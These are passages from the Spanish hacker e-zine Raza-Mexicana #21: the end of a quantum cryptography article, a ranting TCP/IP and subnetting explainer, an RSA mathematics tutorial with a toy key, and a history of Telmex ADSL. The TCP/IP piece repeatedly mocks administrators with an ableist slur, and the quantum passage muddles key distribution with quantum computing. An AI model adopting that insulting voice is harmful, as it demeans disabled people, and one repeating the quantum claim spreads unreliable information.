La idea principal consiste en poder mandar la clave por medio de filtros usando fotones, es enviar flujos de partculas de luz (fotones) especialmente preparadas, para luego medirlas por las partes implicadas en la comunicacin, y luego post-procesar esos datos obtenidos de la medicin (por medio de filtros). El resultado es la clave criptogrfica que se compone de cadenas de bits aleatorios idnticos en ambos extremos.

Raza-Mexicana #21

Conclusin
La computacin cuntica ya es una realidad desde el primer experimento realizado por Bennett y Bassard en 1989, demostr la fiabilidad de la posible idea, con un rango de error muy por debajo de lo que se imaginaba. Se esperan en un tiempo no muy lejano poder tener los conocimientos suficientes y las habilidades necesarias para poder crear y razonar lo que la misma computacin cuntica es, solo un cifrado ms en el que se puede trabajar.

Saludos. Netxing

Fuentes: http://www.physorg.com/news142677178.html http://es.wikipedia.org/wiki/Tiempo_polin%C3%B3mico http://www.bris.ac.uk/news/5941.html

<< Regresar al ndice

Raza-Mexicana #21

Por: DeadSector (deadsector@raza-mexicana.org)

Pequeo articulo explicando lo bsico del protocolo TCP/IP dedicado a todos los administradores mongolitos. La idea para este articulo vino despus de que un administrador me asignara unos ips para la instalacin de unas cmaras web y unos puntos de acceso inalmbricos. Los ips que me dieron eran IP: 192.168.0.70 Netmask: 255.255.255.192 Gateway: 192.168.0.1 (dios bendito dame paciencia) esto me record la vez que me pidieron ayuda en cierta asociacin porque la administradora de sistemas haba descubierto una gran cantidad de conflictos de ips ya que muchas maquina tenan el mismo IP asignado 127.0.0.1.

Vamos a comenzar con los datos bsicos que te pide una mquina al configurar la tarjeta de red IP: direccin de la mquina. Netmask: identifica la red a la cual pertenece la mquina. Gateway: salida para comunicarse con mquinas fuera de tu red. DNS: servidor que te convertir un nombre de mquina a direccin IP. Usemos la informacin que me dieron en ejemplo, Netmask 255.255.255.192 significa que el rango de IPs 192.168.0.X lo vamos a dividir en grupos de 64 IPs por red. La manera ms rpida de sacar la cantidad de IPs usando Netmask es usando 256 y quitndole el nmero final de Netmask. 256 - 192 = 64 IPs.

Raza-Mexicana #21

Porqu 256? Porque de IP 192.168.0.0 al 192.168.0.255 serian 256. SI, el 0 tambin cuenta. O busquen ip calculator en google.

Nos quedan estos grupos de IPs 0 63 ( 192.168.0.0 IP de Red1, 192.168.0.63 IP de broadcast, 62 IPs para maquinas )

64 127 ( 192.168.0.64 IP de Red2, 192.168.0.127 IP de broadcast, 62 IPs para maquinas )

128 191 ( 192.168.0.128 IP de Red3, 192.168.0.191 IP de broadcast, 62 IPs para maquinas )

192 255 ( 192.168.0.192 IP de Red4, 192.168.0.255 IP de broadcast, 62 IPs para maquinas )

El IP que me asignaron era 192.168.0.70 y es parte de grupos de IPs de 64 a 127. Solamente me puedo comunicar con otras maquinas de este mismo rango de IPs. Cuando quiero ver otra mquina de mi red (o sea del 64 al 127), por ejemplo, la IP 192.168.0.71, pasa lo siguiente: 1. Mi computadora enva un aviso al IP de broadcast de mi red: 192.168.0.127 anunciando que busco la mquina de IP 192.168.0.71. 2. Todas las maquinas de mi red reciben esta solicitud porque estn escuchando los broadcast al IP 127.

3. Si una maquina tiene asignado el IP 71 contesta y dice Aqu estoy y mi macaddress es 0102-03-04-05-06!! Raza-Mexicana #21 4. El switchhub guarda la informacin en memoria y sabe que una maquina con ese Mac address est conectada al puerto numero 2 de switchhub. 5. Mi maquina escucha ehh we... el IP que buscabas tiene macaddress 01-02-03-04-05-06 . 6. Mi maquina guarda esa informacin en cache (IP y MAC address) y estoy listo para comunicarme. Cuando quiero comunicarme con otro IP, por ejemplo 8.8.8.9, que esta fuera de mi rango de IPs mi maquina necesita enviarle la peticin a la puerta de salida o Gateway PERO como el

administrador mongolito me dijo que mi Gateway era el 192.168.0.1 esto se vuelve imposible ya que no puedo ver el IP 1 porque no pertenece a mi red y no puede escuchar mis peticiones.

Not pictured: number 1

Otro error clsico de administradores mongolitos es usar Netmask 255.0.0.0 y despus preguntan oie mano, polque no puelo ver el servidol desde la otra oficina? Polque no puedo vel las camaras desde mi casa? (lase con voz de mongolito) y tengo que explicarles hermano lelo lo qu e pasa es que pusiste Netmask 255.0.0.0 lo cual significa que si tienes IP 200.57.141.200 le ests diciendo a tu maquina que todos los ips que comiencen con 200 estn dentro de tu red. Desde 200.0.0.0 hasta 200.255.255.255 y probablemente en tu casa o la otra oficina tienen un IP dentro de ese rango. Tu maquina nunca enva la solicitud a la puerta de salida o Gateway porque est segura que esos IPs deben estar dentro de tu red y no es necesario salir. Ahh pero yo no uso IPs, yo uso nombres para ver otras maquinas o paginas. Los IPs y Netmask tambin me afectan? SI, si te afectan. Para visitar una pgina o conectarte a un servidor por nombre se necesitan 3 cosas bsicas: Nombre ( indica qu es lo que buscamos ) Direccin IP ( dnde se encuentra ) Ruta ( cmo vamos a llegar ah o que camino debemos tomar ) Raza-Mexicana #21 Ejemplo: 1. Cuando quieres visitar www.telmex.com tu maquina le pregunta al servidor que configuraste como DNS cual es la direccin numrica de ese nombre. 2. El servidor DNS busca en sus archivos y si tiene apuntado ese nombre te da la direccin ip, 3. Si no est configurada busca en su cache para ver si no ha buscado ese nombre en las ltimas horas.

4. Si no encuentra el nombre entonces les pregunta a los Root nameservers oie wei, quien puede decirme que ip tiene la pgina www.telmex.com? 5. Los Root nameservers le contestan ira we... los que te pueden ayudar serian ns6.telmex.com o ns7.telmex.com. Ellos tienen el IP blah y son los que manejan el dominio Telmex.com

6. Tu maquina les da las gracias a los Root nameservers (si no lo hace nada de esto funciona) y manda una nueva peticin a ns6.telmex.com preguntando de manera amable por la direccin IP de la pgina www.telmex.com . 7. Los servidores de Telmex le contestan ps esa pagina tiene el IP 200.57.141.200. 8. Tu DNS le avisa a tu maquina que la pagina tiene el IP 200.57.141.200 y tu maquina al darse cuenta que ese IP no pertenece a su red le enva una solicitud a tu Gateway. 9. Tu Gateway verifica sus rutas y se da cuenta que la mejor manera de llegar a ese IP es a travs de tu conexin de internet y le enva la solicitud al ruteador de tu ISP. Le dice un wei de aqu de esta red quiere hablar con el IP 200.57.141.200 Y as sigue la cadenita, router tras router hasta llegar a destino y luego de regreso hasta tu maquina. Para ver un ejemplo de la ruta que sigues para ver esa pagina da el comando tracert www.telmex.com en una ventana de command prompt. Y no es lo mismo Telmex.com que www.telmex .com. WWW.TELMEX.COM TELMEX.COM Encuentra las diferencias. (Hint: WWW) Para que puedas entender piensa en el dominio como tu apellido. Supongamos que lopez.com es el nombre de tu familia y al pedir la pgina te manda a la pgina de la familia, pero si alguien pide juan.lopez.com entonces te mandara a tu pgina personal. La mayora de las empresas usan la misma pgina con o sin www para que los clientes no batallen en localizarla.

Raza-Mexicana #21

Estamos rodeados.

Y tambin existen algunos administradores mongolitos que ponen un servidor llamado documentserver.miempresa.com y piden que se configure tambin www.documentserver.miempresa.com por si algn cliente mongolito le pone www a todas las pginas en su browser. Inclusive muchas empresas dan de alta los nombres w, ww, www, wwww.miempresa.com por si el cliente se equivoco y le faltaron w que no le vaya a salir algn error. En otra ocasin platicamos acerca de los dominios y nameservers. Solo quise tocar los puntos bsicos de protocolo TCP/IP y todo lo que tiene que hacer una mquina para visitar una pgina web. S que las cosas bsicas no les interesan mucho pero mi intencin era simplemente desahogarme de las pendejadas que me toca ver da con da en trabajo. GREETS : Razos, Art0wnz, sk8rvoid, hackers de foros.raza-mexicana.org y a todos los jaqueros de underground.org.mx

Raza-Mexicana #21

Nos vemos DeadSector www.raza-mexicana.org Las imgenes, ortografa y la gramtica cortesa de art.ownz@gmail.com

<< Regresar al ndice

Por: erregebe (erregebe@raza-mexicana.org) El presente artculo tiene como finalidad introducir al lector en las bases matemticas del algoritmo de encripcin RSA. Mi intencin al escribirlo es mostrar lo que hay detrs de su funcionamiento en lugar de proporcionar solo una receta (la cual, considero que todos sabemos). No proporciono datos histricos pues considero que stos abundan por la red. Proporciono un repaso bsico para aquellos lectores que no estn familiarizados con las matemticas.

Breve repaso
Aritmtica modular Una propiedad interesante de la aritmtica modular es que podemos reemplazar cualquier nmero en una operacin, con otro que sea congruente (es decir, que tenga el mismo residuo al ser dividido por el mdulo) sin alterar la operacin mencionada. Por ejemplo: 11 = 3 (mod 4) 9 = 1 (mod 4) 11 + 9 = 20 (mod 4) = 0 (mod 4) 3 + 1 = 4 (mod 4) = 0 (mod 4) 11 * 9 = 99 (mod 4) = 3 (mod 4) 3 * 1 = 3 (mod 4)

Nmeros primos Los nmeros primos son aquellos que slo son divisibles entre s mismos y el nmero 1, es decir, slo tienen 2 factores y no ms. El nmero 1 no es considerado como primo*. Raza-Mexicana #21 Nmeros relativamente primos (tambin llamados coprimos) Los nmeros coprimos son aquellos que no tienen factores en comn excepto el nmero 1, o ms formalmente, son aquellos cuyo Mximo Comn Divisor es 1. Es fcil ver que esta relacin se aplica para nmeros compuestos, pues los nmeros primos son coprimos entre s por definicin.

Ejemplo de nmeros coprimos: MCD(8, 15) = 1 Divisores de 8 = 1, 2, 4, 8 Divisores de 15 = 1, 3, 5, 15 Los nmeros 8 y 15 son relativamente primos. Teorema Fundamental de la Aritmtica El TFA enuncia que para todo nmero existe una y solo una forma de factorizarlo en nmeros primos. Ejemplo: 12 = 2 * 2 * 3 = 2^2 * 3^1 * Esta es una razn por la cual el 1 no es considerado un nmero primo, si as fuera las combinaciones de factores sera infinita, pues podramos aadir infinitos 1 a los factores y seguira resultando el mismo nmero.

Empezando con los conceptos clave de RSA


Funcin Tociente de Euler La funcin tociente de Euler se define como: La cardinalidad del conjunto de nmeros entre 1 y n-1 que son relativamente primos con n. O en otras palabras, cuntos nmeros naturales menores que n son coprimos con el. Se denota con la legra griega phi minscula . Ejemplos: (7) = |{1,2,3,4,5,6}| = 6. (8) = |{1,3,5,7}| = 4 Una vez ms, (1) es igual a 1 por convencin. Ahora bien, siguiendo en el rumbo de los nmeros primos, cmo se calcula el tociente de un nmero primo? Fcil, ya que un nmero primo por definicin solo es divisible entre s mismo y 1, no comparte factores con ningn otro nmero, por lo tanto, todos los nmeros menores que un nmero primo son relativamente primos con l. Raza-Mexicana #21 Ejemplo: Si escogemos un nmero primo, como el 7 y calculamos su tociente obtenemos (7) = (7-1) = 6 Dando un pequeo paso adelante, podemos notar que cuando un nmero tiene exactamente 2 factores primos diferentes, la funcin tociente es muy fcil de calcular:

(p * q) = (p 1)(q 1) Si y solo si: 1) p y q son nmeros primos 2) p y q son nmeros diferentes

Ejemplos: (15) = (3 * 5) = (3 1)*(5 1) = 2 * 4 = 8 (15) = |{1,2,4,7,8,11,13,14}| (9)= (3 * 3) = (3 1)*(3 1) = 2 * 2 = 4 (9)= |{1,2,4,5,7,8}| = 6 - No funciona con factores primos iguales.

Teorema del tociente de Euler Este teorema puede enunciarse as: Si tomamos dos nmeros, T y R, si T y R son relativamente primos, y T es menor que R, si elevamos el nmero T a la potencia (R) y esto es dividido entre R, el resultado siempre ser 1. Es decir T^(R) = 1 (mod R) Ejemplo: (7) = (7-1) = 6 MCD(T, R) = 1 T<R

3^(7) = 1 (mod 7) 3^6 = 1 (mod 7) 729 = 1 (mod 7) Raza-Mexicana #21 104*7 + 1 = 1 (mod 7) Regresemos a nuestra ecuacin T^(R) = 1 (mod R) MCD(T, R) = 1 T<R

Si multiplicamos ambos lados por T^(R) obtenemos T^(R) * T^(R) = 1 (mod R) * T^(R)

Pero ya sabemos que T^(R) = 1 (mod R) [siempre tomando en cuenta las restricciones, T y R son coprimos y T es menor que R]. Por lo tanto tenemos T^(R) * T^(R) = 1 (mod R) * 1 (mod R) Ya vimos el comportamiento de las operaciones bajo el mismo mdulo, as que podemos llegar a T^(R) * T^(R) = 1 (mod R) Agrupando trminos T^2(R) = 1 (mod R) Esto quiere decir que si en lugar de elevar T a la potencia (R), lo elevamos a la potencia 2(R) aun obtenemos el mismo resultado, es decir, 1. Qu pasara si lo elevamos a la potencia 3 (R)? La respuesta es que seguiramos obteniendo como resultado 1, pues del lado derecho de la ecuacin se seguira multiplicando por 1 (mod R) tantas veces como queramos sin alterarse el valor. Ahora podemos concluir que: Si elevamos un nmero T a una potencia mltiplo de (R) y dividimos este resultado entre R, siempre obtendremos 1, siempre que T y R sean relativamente primos y T sea menor que R. k T^(k*(R)) = 1 (mod R)

(Para todo nmero k, si elevamos T a la potencia (k*(R)), obtendremos 1 mod R)

Modificaremos un poco esta ecuacin para tomar el rumbo adecuado, para esto, sustituiremos k*(R) por S. Debemos recordar que S es un mltiplo de (R), o en otras palabras, S es un nmero que al ser dividido entre (R) deja un residuo de cero, esto es, S es congruente con 0 (mod R). (k*(R)) = S S = 0 (mod R)

Nuestra ecuacin queda ahora: T^S = 1 (mod R) Raza-Mexicana #21 Si multiplicamos ambos miembros de sta ecuacin por T obtenemos T^S * T = 1 (mod R) * T T^S+1 = T (mod R) Anlogamente a lo que hicimos con la ecuacin del teorema del tociente, si seguimos multplicando sucesivamente por T ambos lados de esta ecuacin llegaremos por ejemplo a

(T^S+1)*T = T (mod R) * T (T^S+2) = T^2 (mod R) Con lo que podemos llegar a concluir que T^E = T^F (mod R) E = F (mod (R))

Nos estamos acercando al punto final, tomemos la ecuacin T^(S+1) = T (mod R) Y supongamos que encontramos 2 nmeros, P y Q, tales que P * Q = S + 1 Tendremos entonces T^(P * Q) = T (mod R) Aplicando propiedades de los exponentes (T^P)^Q = T (mod R) O si lo preferimos (T^Q)^P = T (mod R) Lo que tenemos aqu es lo siguiente: Tomamos un nmero T, lo elevamos a la potencia P, y nos da alguna cantidad, despus elevamos esa cantidad a la potencia Q y obtenemos como resultado el nmero T del principio. Por la propiedad de los exponentes esto puede realizarse intercambiando P por Q. De una forma ms explcita T^P = X (mod R) Que es la encripcin y X^Q = T (mod R) Que es la desencripcin (o viceversa). Raza-Mexicana #21 Siendo T el texto claro a encriptar, X el mensaje encriptado, P, Q y R las llaves de cifrado. P y R forman la llave pblica, Q y R forman la llave privada.

Creacin de las llaves


El proceso es el siguiente: Escogemos 2 nmeros primos al azar, y los multiplicamos entre s para encontrar R, la razn para hacer esto es la facilidad para calcular la funcin del resultado.

R = 11 * 5 = 55 (55) = (11 1)(5 1) = (10)(4) = 40 Ahora, necesitamos encontrar nmero P y Q tales que: P * Q = 1 (mod (R)) P * Q = 1 (mod 40) Cmo vamos a encontrar tales nmeros? Cules son las restricciones para dichos nmeros? Empecemos, nuestra nica restriccin es que P y Q sean coprimos con , es decir, con 40. Tambin podramos escogerlos de tal manera que P y Q sean coprimos entre s. Escojamos P = 7 Ahora necesitamos encontrar un nmero Q tal que 7 * Q = 1 (mod 40) Esto significa que debemos encontrar un nmero Q tal que al multiplicarlo por 7 y dividirlo entre 40, nos de cmo resultado 1. El primer valor que cumple tal condicin es 23. Por lo tanto Q = 23. Nuestras llaves quedan de la siguiente manera: Llave publica P, R (7, 55) Llave privada Q, R (23, 55) Creamos nuestro esquema de codificacin: Raza-Mexicana #21

2 A 19 N 38 0

3 B 21 O 39 1

4 C 23 P 41 2

6 D 24 Q 42 3

7 E 26 R 43 4

8 F 27 S 46 5

9 G 28 T 47 6

12 H 29 U 48 7

13 I 31 V 49 8

14 J 32 W 51 9

16 K 34 X 52 *

17 L 36 Y 53 espacio

18 M 37 Z

Nuestro texto a encriptar ser: RAZAMEX Sustituyendo los valores de cada letra tenemos que RAZAMEX = (26, 2, 37, 2, 18, 7, 34) Para encriptar usamos una de las llaves, la privada por ejemplo (23, 55). Esto se hace de la siguiente manera: R = 26^23 (mod 55) = 31 A = 2^23 (mod 55) = 8 Z = 37^23 (mod 55) = 53 A = 2^23 (mod 55) = 8 M = 18^23 (mod 55) = 2 E = 7^23 (mod 55) = 13 X = 34^23 (mod 55) = 34 Nuestro mensaje encriptado queda como (31, 8, 53, 8, 2, 13, 34) = VF FAIX Para desencriptar usamos la otra llave, la pblica (7, 55) de la siguiente forma: V = 31^7 (mod 55) = 26 F = 8^7 (mod 55) = 2 Espacio = 53^7 (mod 55) = 37 F = 8^7 (mod 55) = 2 A = 2^7 (mod 55) = 18 I = 13^7 (mod 55) = 7 X = 34^7 (mod 55) = 34 Raza-Mexicana #21 De tal forma que recuperamos el mensaje original (26, 2, 37, 2, 18, 7, 34) = RAZAMEX Notas finales 1. Este no es un ejemplo real, es un ejemplo extremadamente simple, usado para fines demostrativos. 2. Ntese que este ejemplo no es mas seguro que un simple cifrado de sustitucin tal como ROT13.

3. Ntese asimismo los valores que no fueron incluidos en el esquema de codificacin. Estos valores son: 5, 10, 11, 15, 20, 22, 25, 30, 33, 35, 40, 44, 45, y 50 Y no fueron incluidos porque comparten factores con R (55) GCD (5, 55) = 5 GCD(10, 55) = 5 GCD(11, 55) = 11 GCD(15, 55) = 5 etc. 4. El nmero 1 no fue incluido pues al elevarlo a cualquier exponente, quedara el mismo resultado, 1, lo que significa que el mensaje quedara en la misma forma, encriptado y descencriptado. No slo eso, adems, podemos encontrar valores tal como el de la letra X (34) que al ser encriptado nos devuelve el mismo valor, lo cual es un fallo crtico en un algoritmo de encripcin.

Enlaces de inters
Nmeros primos en Pagina de entrenamiento para el ACM ICPC de la Universidad Tecnolgica de la Mixteca. Incluye cdigo para programar la Criba de Eraststenes. http://mictlan.utm.mx/html/jaws/html/indexbf36.html?page/primos Teorema Fundamental de la Aritmtica en Wikipedia http://es.wikipedia.org/wiki/Teorema_fundamental_de_la_aritmtica Algoritmo RSA en RSA Laboratories (ingls) http://www.rsa.com/rsalabs/node.asp?id=2146

<< Regresar al ndice


Raza-Mexicana #21

Por: int_0x40 (int_0x40@raza-mexicana.org)

Resumen: el presente documento pretende hacer un recuento descriptivo-explicativo del servicio ADSL de Telmex, de sus antecedentes y caractersticas generales. No es un estudio exhaustivo sino un acercamiento documental que adems tiene la aspiracin de aportar algunos datos que quiz sean de inters para ms de un curioso aficionado a temas como las redes telefnicas, el protocolo ATM y el ADSL en tierra azteca. A fines de los ochentas y principios de los noventa Mxico requera una infraestructura nacional de telecomunicaciones adecuada para ofrecer servicios que en otros pases ya tenan un rato de haberse implementado. En esos aos slo algunas instituciones educativas y algunas privadas haban contado con conexiones analgicas privadas de 9600 bits por segundo basadas tanto en protocolos IBM como DEC5. Era necesaria una infraestructura que abarcara a todo el pas, que fuera moderna, que sustituyera a las vetustas y limitadas con las que haba contado por dcadas y que abriera las posibilidades de ampliacin a otros servicios que comenzaban a difundirse por todo el mundo, especialmente para usuarios comunes como nosotros que no fueran instituciones educativas y comerciales6. Para el caso que aqu nos ocupa, tuvo que privatizarse la principal paraestatal mexicana encargada de la telefona para que comenzara ese proceso de modernizacin y ampliacin de servicios que llegaran al usuario domstico. Probablemente el arranque de la modernizacin de la infraestructura de telecomunicaciones de Telmex dio inicio en el ao de 1991 como parte de una estrategia para cambiar la red telefnica basada en cobre, la cual promovi el despliegue de la red nacional de fibra ptica, a fin de sustentar la creciente demanda de servicios7.

El primer nodo Internet lo estableci una universidad mexicana privada con otra de Texas y funcionaba con 4 hilos y 9600 bps. Aunque ya haban existido previamente algunas conexiones va BITNET. Esa misma universidad alberg el primer servidor de nombres para el dominio .mx. 6 Mxico ya tena desde 1992 una salida digital de 56kbps al Backbone de Internet establecida por MEXnet, la cual creci en 1994 a 2Mbps de tipo E1 y que sera el origen de redes que interconectaron exclusivamente a centros educativos, comerciales y financieros. 7 El despliegue de la red de fibra ptica se basara en trayectos cerrados, estableciendo una diversidad de rutas que permitiera asegurar una alta disponibilidad y fiabilidad en su operacin. De la misma forma, contara con mltiples vas de acceso, que permitieran la extensin de los servicios hacia todos los sectores de la poblacin. Su operacin se complementara con la compra de equipos de transmisin ptica (SDH) y el tendido de cableado submarino e intercontinental.

Raza-Mexicana #21

Se figuraba entonces una red telefnica pblica conmutada8 con posibilidades de ampliacin a servicios como la videoconferencia bajo demanda, ATM, y ADSL que llegara a usuarios domsticos. La red inteligente que Telmex introduce alrededor de 1994 consideraba una nueva arquitectura de red donde se incorporaban elementos innovadores con funciones especficas. La forma de su operacin se basaba en la interconexin de nodos donde residan aplicaciones informticas, centrales de conmutacin y sistemas de bases de datos en tiempo real, que se enlazaban mediante avanzados sistemas de sealizacin9, para proveer, adems del servicio de telefona bsica, toda una extensa posibilidad de nuevos y variados servicios como nmeros gratuitos y lnea caliente, etc. Alrededor del ao de 1995 Telmex introduce los primeros sistemas SDH, de transmisin en lnea sobre fibra ptica, que resolveran las dificultades de saturacin y cada de las redes PDH (Plesiochronous Digital Hierarchy). Esta nueva tecnologa en el pas, aparte de propiciar una forma sencilla de escalabilidad para las capacidades de transmisin, incorporara adems en teora mecanismos de proteccin para fallas y proporcionara un soporte sistemtico para la gestin de red. Posteriormente, con el propsito de aumentar ms la capacidad de transmisin sin tener que instalar nuevas fibras pticas, en el ao de 1998 se inici el despliegue de equipos con tecnologa DWDM, que permitiran la transmisin simultnea de varias seales pticas sobre una misma fibra10. Dada su amplia capacidad, los sistemas DWDM se emplearon principalmente en aplicaciones de Larga Distancia y Metropolitanas.

Se dice que una red es conmutada porque los circuitos de voz del canal de 4 kHz (rango de frecuencia para la voz humana) as como posteriormente los datos multiplexados en los canales de 150 kHz a 1.1 MHz del medio, necesitan ser conmutados y optimizar los recursos de la red para establecer conexiones temporales a bajo costo para los abonados o usuarios finales de la conexin. El proceso de conmutacin de la red telefnica se realiza en las centrales. Los elementos de la conmutacin cumplen una funcin muy sencilla en teora: establecer una ruta de comunicacin entre dos abonados. Es ah donde el hardware, software y tipo de conmutacin que realizan las centrales juega un papel esencial.
9

Raza-Mexicana #21

La sealizacin es el lenguaje que las centrales telefnicas utilizan para hablarse entre s y para hablar con los equipos terminales de los abonados. Como existen mltiples fabricantes de equipo telefnico, tanto de centrales como de terminales, es necesario que los equipos sigan protocolos de sealizacin. En Mxico, la interconexin a nivel sealizacin de Operadores de RTPC puede ser elegida de comn acuerdo entre las partes o, en caso de no llegar a ningn acuerdo, cumplir con uno de los dos protocolos normados por la COFETEL. En la prctica, la libertad de eleccin es arbitraria porque los Operadores nuevos deban interconectarse con una infraestructura dominante, as que las opciones, ms bien, las dictaba Telmex.
10

La transmisin se entiende como el medio fsico que conduce las seales portadoras de voz o datos por la red as como tambin los equipos electrnicos del medio. El medio fsico de transmisin como ya sabemos puede ser aire, cable coaxial, fibra ptica, satlite, etc. Telmex utiliza principalmente fibra ptica de manufactura avanzada, la nica en Mxico preparada para transmitir seales de multiplexacin de divisin de longitud de onda (WDM). Los equipos electrnicos (sistemas) de transmisin optimizan el uso del ancho de banda disponible en el medio. Las principales funciones de los sistemas de transmisin son organizar, segregar y optimizar la utilizacin de canales en el medio; multiplexar (en aquellos aos en cuanto a tiempo;

De esa manera la evolucin lgica de la infraestructura de Telmex sigui una va paralela entre la Larga Distancia Nacional e Internacional; los servicios no geogrficos de LD sin costo, las hot lines, los nmeros universales, etc.; las redes privadas virtuales, nacionales y/o mundiales; el Frame Relay que sustitua a las redes X. 25; hasta llegar a los servicios de Internet domstico que nos interesan. A partir de 1999 Telmex introduce el ATM que es una tecnologa para la transmisin de voz, datos y video en redes de banda ancha, basada en la conmutacin de paquetes. ATM emerge con gran xito en la dcada de los 90s gracias a su amplia capacidad para ofrecer calidad de servicio. Fue la primera plataforma integral multiservicio, representando un paso importante en el suministro de servicios de banda ancha. En el ao de 2001 con el lanzamiento del servicio Prodigy Infinitum se ofrecera acceso a Internet en teora de alta velocidad por medio de lneas digitales dedicadas de banda ancha sobre tecnologa DSL utilizando la infraestructura existente de pares de cobre en el bucle del abonado. Para el 2002 tambin se implementa la red de acceso de banda ancha con el servicio de Prodigy Infinitum que permitira la conexin inalmbrica de alta velocidad a Internet en casas, negocios y sitios pblicos, por medio de un equipo terminal (mdem-router) con tecnologa WiFi y que en teora funcionara con cualquiera de las velocidades que se ofrecan en los accesos de banda ancha con tecnologa ADSL. Y as llegamos a un servicio que nos interesa analizar un poco ms por su importancia hasta el da de hoy. Durante la dcada de los noventa el servicio Telmex de acceso domstico a Internet era por medio de mdems dial up va PPP, que se convirti en la forma habitual de conexin por parte de los usuarios comunes y las pequeas empresas durante esos aos. Pero ese tipo de conexin contaba con varios inconvenientes: la lnea telefnica estaba ocupada mientras exista la conexin a Internet, lo que significa que se consuman recursos de la red telefnica, adems de que la velocidad estaba limitada a un mximo de 56 Kbps que no se lograba realmente en la prctica.

Raza-Mexicana #21

El servicio ADSL (Asymmetric Digital Subscriber Line) de Telmex en cambio, resolvera varios de los problemas inherentes a las conexiones PPP dial up del lado del usuario y de la central telefnica, debido que, por un lado (aunque utilizaba el cableado de cobre trenzado del bucle de abonado como medio de transmisin), la lnea telefnica quedaba libre para llamadas mientras exista la conexin permanente a Internet gracias a los filtros de frecuencia y, por otro, la conexin no consuma recursos de la red telefnica, puesto que, cuando la seal analgica llegaba a la central11, se extraan los paquetes del bucle del abonado y pasaban a la red IP (digital) de la

hoy da en cuanto a longitud de onda) distintos y diversos canales de voz y datos para acarreo a alta velocidad; explotar el ancho de banda disponible en el medio, etc.
11

Que en realidad sigue usando alguna variante del protocolo PPP para conectar los modems-routers ADSL de los usuarios con el Gateway ATM del ISP.

operadora que los encapsulara y direccionara con en el protocolo ATM (Asynchronous Transfer Mode).

Propiamente hablando, el modem-router que nos da Telmex (2wire o Thomson) ofrece una conexin Ethernet del lado del usuario como si fuera un concentrador y de esa manera permitir a ms de un equipo conectarse a la lnea ADSL sin afectar la lnea telefnica. En cambio la conexin hacia el exterior es diferente. Se requieren dos dispositivos esenciales cuando menos: el que se instala en la casa del cliente y otro que se encuentra del lado de la central Telmex ms cercana a la localidad del abonado, entre 3.5 y 5.5 kilmetros (por eso la distancia a que est el suscriptor de esa central afectar la velocidad de conexin o el ancho de banda). El dispositivo del usuario, como ya dijimos, realiza comnmente mltiples funciones como modular y demodular la seal, asignar direcciones IP, rutear y filtrar paquetes. Puede tener interfaces USB y Ethernet pero su principal papel es encapsular paquetes IP en celdas ATM12 que se modulan para transmitirse en los canales de frecuencia portadores xDSL que luego se filtran a los cables de cobre de la lnea telefnica por medio de un splitter. La lnea telefnica del abonado puede correr atravesando varios dispositivos que separen nuevamente la seal de voz de la de datos, que se encarguen de separar sta ltima segn el ancho de banda contratado, y a travs de switches ATM hasta ser recibida por un dispositivo DSL de acceso para multiplexeo (DSLAM), el cual maneja mltiples celdas ATM de diferentes lneas de suscripcin y las reenva directamente al la red BT ATM (cableado subterrneo de fibra ptica). Pero cmo se fracciona la seal que viaja por la lnea telefnica de Telmex y porqu pueden transmitirse voz y datos al mismo tiempo? Bueno, para lograr que la lnea de telfono coexista con la conexin a Internet, como ya dijimos antes brevemente, se hace un proceso de modulacin, demodulacin y filtrado de la seal. De eso se encargan precisamente los modems-routers y los filtros (splitters) que nos da Telmex. Lo que ocurre tcnicamente es que se hace una divisin del espectro de frecuencia: la parte baja sigue siendo utilizada por el canal de voz (hasta 4 kHz) y desde ah se ubica el espectro utilizado por ADSL (considerando tambin la limitacin inherente del par de hilos de cobre). Aclaramos que este sistema es de dos vas: reserva el espectro bajo de frecuencia para la salida a la red (upstream), y el resto para la entrada (downstream). De manera general no se puede llegar a los 1,1 MHz que es el tope terico mximo del medio, puesto que la calidad del par de hilos es muy variable, depende de la humedad, la longitud entre dispositivos del usuario y la central, as como de lo vetusto que sea el cableado del bucle. Por eso se usa una modulacin de adaptacin: los dos sentidos del canal de frecuencia se dividen en sub-canales o bandas de 4 kHz independientes que se modulan casi igual como con los viejos modems tradicionales. Debido a eso se logran treinta y dos canales de upstream y hasta doscientos cincuenta y seis de downstream, con potencial de 60 kbps cada uno de los mismos (modulados en

Raza-Mexicana #21

12

Las celdas o clulas ATM son paquetes ensamblados de 53 bytes. 5 para el header y 48 para el payload. Dicho sea de paso, el ATM es un protocolo desarrollado a mediados de los ochentas y orientado a la conexin.

QAM o quadrature amplitude modulation) que, acumulados, proporcionan un mximo de 15,36 Mbps de entrada y 1,92 Mbps de salida. Sin embargo, las conexiones ms ptimas no consiguen aprovechar correctamente los canales superiores y se considera que el lmite mximo de salida es de 8 Mbps. Del mismo modo, Telmex no suele ofrecer conexiones tan rpidas (el paquete Todo Mxico ofrece 5 Mbps), lo que hace que no se pueda lograr el lmite terico. Por otro lado, los protocolos utilizados dentro del ADSL de esta empresa no estn definidos por el estndar. Entre los posibles protocolos usados por Telmex para el ADSL, estn como ya dijimos el ATM y el mismo PPP. Conclusin: Uno de los servicios de Internet para usuarios domsticos ms utilizados hoy da en Mxico, junto con el cable ha sido el ADSL, que a nivel nacional es mercadeado por Telmex, empresa que atiende el mayor porcentaje de usuarios. Hemos descrito en este documento cmo se lleg a la difusin de este servicio, su conexin con otras infraestructuras que le precedieron y sus principales caractersticas. Como idea final creo que queda claro porqu es poco probable hackear los modems-routers de Telmex con la finalidad especfica de ampliar la velocidad o el ancho de banda de la manera en como se ha venido haciendo con los cable-modems. En los modems-routers ADSL no existe un servicio TFTP corriendo, ni hay intercambio de archivos de configuracin bajo las especificaciones DOCSIS, en los cuales sea posible modificar los rangos de upstream o downstream o hacerse de direcciones MAC del dispositivo, por la sencilla razn de que el medio de transmisin en la lnea del abonado no es cable coaxial, sino cables trenzados de cobre, adems de que el ancho de banda de la seal se define y configura del lado del ISP con escasa o nula participacin del dispositivo del usuario final. Ambas tecnologas funcionan mediante redes hbridas con fibra ptica, pero el medio de transmisin en el bucle abonado es distinto as como los dispositivos para la de-modulacin de la seal. Ese tipo de hacking slo sera posible desde mi punto de vista, atacando los dispositivos ATM o los DSLAM que intervienen directamente en el control de la seal, o en su caso, haciendo ingeniera social a alguien que trabaje en la central. Referencias: http://www.faqs.org/rfcs/rfc2684.html Raza-Mexicana #21 http://www.cisco.com/en/US/tech/tk175/tk819/technologies_white_paper09186a0080093bd2.sh tml ANSI T1.413-1998 Network and Customer Installation Interfaces Asymmetric Digital Subscriber Line (ADSL) Metallic Interface. (American National Standards Institute 1998) Engineering Projects on Telecommunication in Mexico CCBEN, UCAT, 2005. 